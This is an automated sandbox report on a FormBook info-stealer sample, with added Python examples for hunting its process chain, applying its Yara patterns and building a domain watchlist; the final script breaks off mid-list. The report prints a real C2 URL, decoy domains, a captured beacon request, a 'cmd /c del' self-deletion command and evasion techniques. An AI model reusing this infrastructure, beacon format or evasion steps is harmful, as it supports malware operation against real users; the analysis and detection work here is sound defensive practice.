
Windows Analysis Report EH5ro3Hyug

Overview

General Information

Sample Name: EH5ro3Hyug (renamed file extension from none to exe)
Analysis ID: 491359
MD5: dff3bf025dcd487a2f0fb22b4ccf8998
SHA1: 1ff59c9410fb281ffc8d2c3c1fc3268eacd5dba1
SHA256: 230b56b1d072725eff3a0e100515ba924377c9f0a79308bbfa3123269ee23d56
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • EH5ro3Hyug.exe (PID: 6400 cmdline: 'C:\Users\user\Desktop\EH5ro3Hyug.exe' MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
    • EH5ro3Hyug.exe (PID: 5412 cmdline: C:\Users\user\Desktop\EH5ro3Hyug.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
    • EH5ro3Hyug.exe (PID: 5660 cmdline: C:\Users\user\Desktop\EH5ro3Hyug.exe MD5: DFF3BF025DCD487A2F0FB22B4CCF8998)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7104 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • WWAHost.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4972 cmdline: /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
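
The tree above is the whole FormBook story in four hops: the .NET loader starts two copies of itself, the hollowed copy injects into explorer.exe, the injected explorer launches a 32-bit system binary from SysWOW64 (here autoconv.exe and WWAHost.exe) to host the payload, and that host spawns cmd.exe to delete the original file. The following is an added example, not Joe Sandbox output, that looks for those three links in process-creation events. The events are constructed from the PIDs, paths and command lines listed above; the image path of cmd.exe is an assumption (the report shows only its command line), and explorer.exe is given PID 5660 as parent only because the sandbox draws injected processes under the injector.

```python
"""Hunt for the execution chain in the Process Tree above over
process-creation events. Added example, not Joe Sandbox output."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str


# Constructed from the Process Tree above: PIDs, paths and command lines are
# the report's. The image path of cmd.exe is an assumption (the report only
# shows its command line), and explorer.exe's parent is given as PID 5660
# because the sandbox draws injected processes under the injector; a real
# process-creation log would show explorer.exe's real parent instead.
EVENTS = [
    ProcEvent(6400, 1, r"C:\Users\user\Desktop\EH5ro3Hyug.exe",
              r"'C:\Users\user\Desktop\EH5ro3Hyug.exe'"),
    ProcEvent(5412, 6400, r"C:\Users\user\Desktop\EH5ro3Hyug.exe",
              r"C:\Users\user\Desktop\EH5ro3Hyug.exe"),
    ProcEvent(5660, 6400, r"C:\Users\user\Desktop\EH5ro3Hyug.exe",
              r"C:\Users\user\Desktop\EH5ro3Hyug.exe"),
    ProcEvent(3424, 5660, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(7104, 3424, r"C:\Windows\SysWOW64\autoconv.exe",
              r"C:\Windows\SysWOW64\autoconv.exe"),
    ProcEvent(7092, 3424, r"C:\Windows\SysWOW64\WWAHost.exe",
              r"C:\Windows\SysWOW64\WWAHost.exe"),
    ProcEvent(4972, 7092, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'"),
    ProcEvent(5548, 4972, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

SYSWOW64 = "c:\\windows\\syswow64\\"
DEL_RE = re.compile(r"""/c\s+del\s+['"]?([^'"]+\.exe)""", re.IGNORECASE)


def base(image: str) -> str:
    return ntpath.basename(image).lower()


def find_formbook_chain(events):
    """Return (tag, pid, ...) tuples for the three links of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # 1. A binary launching a fresh copy of itself, as the .NET loader
        #    does twice here before hollowing the second copy.
        if e.image.lower() == parent.image.lower():
            findings.append(("self_spawn", e.pid))
        # 2. explorer.exe starting a 32-bit system binary from SysWOW64 with
        #    no arguments: the injected explorer picks a host for the payload.
        if (base(parent.image) == "explorer.exe"
                and e.image.lower().startswith(SYSWOW64)
                and e.cmdline.strip().lower() == e.image.lower()):
            findings.append(("explorer_to_syswow64", e.pid))
        # 3. cmd.exe deleting an executable: the "Self deletion via cmd
        #    delete" signature. Record which process ordered it.
        m = DEL_RE.search(e.cmdline)
        if base(e.image) == "cmd.exe" and m:
            findings.append(("self_delete", e.pid, base(parent.image), m.group(1)))
    return findings


def deleted_original(events) -> bool:
    """True when a self-delete target is the image of a root process."""
    pids = {e.pid for e in events}
    roots = {e.image.lower() for e in events if e.ppid not in pids}
    return any(f[0] == "self_delete" and f[3].lower() in roots
               for f in find_formbook_chain(events))


if __name__ == "__main__":
    for finding in find_formbook_chain(EVENTS):
        print(finding)
    print("original deleted:", deleted_original(EVENTS))
```

None of the three links is conclusive alone (browsers and updaters also start copies of themselves, and installers legitimately delete their own stub); the value is in the chain, in particular a SysWOW64 host with an empty command line ordering the deletion of the process that started the whole tree.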

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x6fda8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x70012:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9d1c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9d432:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7bb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xa8f65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x7b631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xa8a51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x7bc47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xa9067:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x7bdbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa91df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x70a2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9de4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x7a8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa7ccc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x71723:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x9eb43:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x81db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xaf1d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x82dba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(25 further memory-dump entries not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.EH5ro3Hyug.exe.2c48584.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
6.2.EH5ro3Hyug.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.EH5ro3Hyug.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.EH5ro3Hyug.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18839:$sqlite3step: 68 34 1C 7B E1
          • 0x1894c:$sqlite3step: 68 34 1C 7B E1
          • 0x18868:$sqlite3text: 68 38 2A 90 C5
          • 0x1898d:$sqlite3text: 68 38 2A 90 C5
          • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
6.2.EH5ro3Hyug.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(2 further unpacked-PE entries not shown)
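
The two community rules above are pure byte patterns, so they can be re-applied to a dump without the yara engine. The following is an added example, not part of the report or of either rule's source: it copies the hex strings and the offsets reported for 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, rebuilds a zero-filled stand-in of that dump with the patterns at those offsets, scans it, and decodes the three JPCERT strings, whose leading byte 68 is the x86 opcode for push imm32. The match thresholds are assumptions (yara-signator rules normally require a subset of their sequences, the JPCERT rule all of its strings); the page does not show either rule's condition, and reading the pushed constants as hashed sqlite3 API names is my interpretation of the string names, not something the page states.

```python
"""Apply the byte patterns from the Yara Overview above to a memory image
without the yara engine. Added example, not part of the report."""
import struct

# Pattern hex copied from the Yara Overview above.
RULES = {
    "Formbook_1": {
        "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
        "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
        "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
        "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
        "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
        "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
        "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
        "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
        "$sequence_8": "3C 54 74 04 3C 74 75 F4",
        "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    },
    "Formbook": {
        "$sqlite3step": "68 34 1C 7B E1",
        "$sqlite3text": "68 38 2A 90 C5",
        "$sqlite3blob": "68 53 D8 7F 8C",
    },
}
# Assumed conditions, not shown on the page: yara-signator rules usually ask
# for a subset of their sequences, the JPCERT rule for all three constants.
MIN_MATCHES = {"Formbook_1": 7, "Formbook": 3}

# Offsets reported for 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack above, used to
# rebuild a stand-in for that dump.
REPORTED_OFFSETS = {
    "$sequence_0": [0x9908, 0x9B72], "$sequence_1": [0x156A5],
    "$sequence_2": [0x15191], "$sequence_3": [0x157A7],
    "$sequence_4": [0x1591F], "$sequence_5": [0xA58A],
    "$sequence_6": [0x1440C], "$sequence_7": [0xB283],
    "$sequence_8": [0x1B917], "$sequence_9": [0x1C91A],
    "$sqlite3step": [0x18839, 0x1894C], "$sqlite3text": [0x18868, 0x1898D],
    "$sqlite3blob": [0x1887B, 0x189A3],
}


def pattern_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf: bytes) -> dict:
    """Every offset of every pattern, keyed rule -> string -> [offsets]."""
    hits = {}
    for rule, strings in RULES.items():
        hits[rule] = {}
        for name, hexstr in strings.items():
            pat, offs, pos = pattern_bytes(hexstr), [], 0
            while (pos := buf.find(pat, pos)) != -1:
                offs.append(pos)
                pos += 1
            hits[rule][name] = offs
    return hits


def evaluate(buf: bytes) -> dict:
    """rule -> True when enough distinct strings matched (assumed thresholds)."""
    hits = scan(buf)
    return {rule: sum(1 for o in hits[rule].values() if o) >= MIN_MATCHES[rule]
            for rule in RULES}


def push_imm32(hexstr: str) -> int:
    """The JPCERT strings are 'push imm32' (opcode 68): return the constant."""
    pat = pattern_bytes(hexstr)
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a 5-byte push imm32")
    return struct.unpack("<I", pat[1:])[0]


def build_sample(drop=()) -> bytes:
    """Constructed stand-in dump: zero-filled, patterns at reported offsets."""
    buf = bytearray(0x1D000)
    for strings in RULES.values():
        for name, hexstr in strings.items():
            if name in drop:
                continue
            pat = pattern_bytes(hexstr)
            for off in REPORTED_OFFSETS[name]:
                buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample()
    print(evaluate(dump))
    for name, hexstr in RULES["Formbook"].items():
        print(f"{name}: push 0x{push_imm32(hexstr):08X}")
```

The point of the threshold logic is visible in the two negative cases: dropping one JPCERT constant defeats that rule entirely, while Formbook_1 survives the loss of several sequences, which is why an unpacked-PE match on both rules is stronger evidence than either alone.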

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

Found malware configuration
Source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}
Multi AV Scanner detection for submitted file
Source: EH5ro3Hyug.exe | Virustotal: Detection: 31%
Source: EH5ro3Hyug.exe | ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match | File source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY
Source: 6.2.EH5ro3Hyug.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: EH5ro3Hyug.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: EH5ro3Hyug.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WWAHost.pdb | source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP | source: EH5ro3Hyug.exe, 00000006.00000002.757233904.0000000003630000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe, 0000000C.00000002.935271786.0000000003C5F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: EH5ro3Hyug.exe, 00000006.00000002.756041346.0000000001B7F000.00000040.00000001.sdmp, WWAHost.exe
Source: C:\Users\user\Desktop\EH5ro3Hyug.exe | Code function: 4x nop then jmp 092FAA79h

            Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe | Domain query: www.sherwoodmastiff.com
Source: C:\Windows\explorer.exe | Domain query: www.kingtreemusic.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.eastwestasia-thailand.com/hht8/
Source: Joe Sandbox View | ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: global traffic | HTTP traffic detected: GET /hht8/?V2=UdJvmcuMRIp/sNw0TNsoQAu26okuAPtZrfHvhR73KElz+11bxdQbtsNL5cLMDPcOzFi3&5j=SVeDzJKXh HTTP/1.1 | Host: www.sherwoodmastiff.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 160.153.136.3 160.153.136.3
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: EH5ro3Hyug.exe, 00000000.00000002.689041915.00000000012F7000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comma
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: EH5ro3Hyug.exe | String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: EH5ro3Hyug.exe, 00000000.00000002.694910866.0000000006D92000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | DNS traffic detected: queries for: www.sherwoodmastiff.com
Source: EH5ro3Hyug.exe, 00000000.00000002.688667693.0000000001050000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
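
The configuration in the Malware Configuration section and the traffic in this Networking section fit together: the single "C2 list" entry supplies the URI path (/hht8/), and the sandbox saw that path requested from www.sherwoodmastiff.com, a domain from the "decoy" list, with no User-Agent header. FormBook sends the same beacon to the decoys and to the real C2, so for hunting purposes every decoy plus the C2 host is a watch domain and the path is the discriminator. The following is an added example, not part of the report: it loads the configuration copied from above, derives the watchlist, and classifies HTTP requests. The captured GET is reproduced from this section; the other two requests are constructed for contrast, and the "two parameters, first one a long base64-like blob" check is a heuristic read off that one captured request, not a documented FormBook invariant.

```python
"""Turn the extracted FormBook configuration above into a network watchlist
and test HTTP requests against it. Added example, not part of the report."""
import json
import re
from urllib.parse import urlsplit

# Copied verbatim from the Malware Configuration section above.
CONFIG_JSON = r'''{"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}'''

# First request: the one captured in the Networking section (no User-Agent).
# The other two are constructed for contrast.
SAMPLE_REQUESTS = [
    {"method": "GET",
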